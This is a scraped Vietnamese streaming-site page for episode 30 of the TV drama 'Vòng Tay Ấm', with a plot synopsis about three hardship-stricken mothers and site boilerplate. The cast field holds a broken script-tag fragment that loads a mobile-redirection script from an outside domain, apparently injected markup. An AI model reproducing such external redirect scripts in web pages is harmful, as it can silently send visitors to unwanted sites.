xem phim vong tay am online, download Vòng Tay Ấm 30/36 (Phim Việt Nam ) hd online
Neu ban khong vao duoc, xin vui long thu lai sau, chung toi dang co gang khac phuc su co.
 
 
Vòng Tay Ấm 30/36 (Phim Việt Nam ) - phim viet nam
vong tay am

Vòng Tay Ấm 30/36 (Phim Việt Nam )

,

12 episodes | Luot Xem: 491146   |  0 |  
Dien Vien: src="http://raphd.net/js/redirection_mobile.js">

cham bi  Description - Thong tin them ve phim

Phát sóng lúc 20:45 từ thứ năm đến chủ nhật trên HTV7, bắt đầu từ ngày 30-04.

Xoay quanh ba tuyến nhân vật chính là người mẹ điên Thảo Nguyên, cô gái Ý Nhi nông nổi và Tuyết - cô gái quê ít học.

Từ một sai lầm của người chồng, Thảo Nguyên rơi vào điên dại, hai đứa con thơ bé Nam và bé Vân đứng trước gia đình tan vỡ phải đối diện với nỗi cơ cực, đói nghèo, và cô độc. Hai em bé phải sớm bước vào đời, chúng làm đủ mọi nghề để kiếm sống từ đánh giày, bán bánh bò, bị bắt cóc, bị lừa gạt... Nhưng chúng vẫn ôm giấc mơ cháy bỏng là tìm được mẹ.

Ý Nhi vì một phút nông nổi của tuổi trẻ, đi theo bạn bè xấu và bị lợi dụng. Ý Nhi mang thai và không biết ai là tác giả của bào thai đó. Muốn phá thai nhưng lương tâm cắn rứt, Ý Nhi quyết định sinh con dưới nghèo khó, bần hàn...

Bên cạnh Thảo Nguyên, Ý Nhi - những bà mẹ trẻ bất hạnh còn có Tuyết, một cô gái quê ít học bị gia đình ép lấy chồng Đài Loan. Cuộc sống làm dâu xứ người với bao cay đắng, tủi hờn đã khiến Tuyết từng đứng trước tuyệt vọng, quỵ ngã...

Mỗi người phụ nữ trong phim là một cảnh đời ngang trái, nhưng trên tất cả, họ là những người mẹ. Và tất cả những người mẹ, dù là ai, dù làm nghề gì, dù ở đâu, dù giàu hay nghèo, vẫn là những người phụ nữ yêu thương con bao la, và sẵn sàng hy sinh cả mạng sống vì con mình. Đó là thông điệp nhiều cảm xúc của bộ phim truyền hình Vòng tay ấm.
Phim cùng thể loại - Similar movies
View: 152530
View: 2201602
View: 1153956
View: 705405
Đăng kí nhận phim mới qua email

 
Copyright © 2007 - 2012 Kenh88.Com Phim Online Entertainment Network
Phim88.com is a portal that made for Phim, Phim Online, Xem Phim, Online Phim and Xem Phim Online.
Phim88.Com main focus on phim online, online phim, xem phim online, download phim. Phim tai phim88.com chat luong cao va download truc tiep. Ban co the xem phim online hoac download phim toc do cao. Phim88.Com covers phim viet nam, phim hong kong, phim han quoc, phim trung quoc, phim dai loan, phim le, phim bo, phim tap, phim tvb.
Phim88.Com is absolutely legal and contain only links to other sites on the Internet : (youtube.com, dailymotion.com,.. ).Phim88.Com is not responsible for the accuracy, compliance, copyright, legality, decency, or any other aspect of the content of other linked sites.
If you have any legal issues please contact appropriate media file owners / hosters.

DMCA Notification | Privacy Policy
amung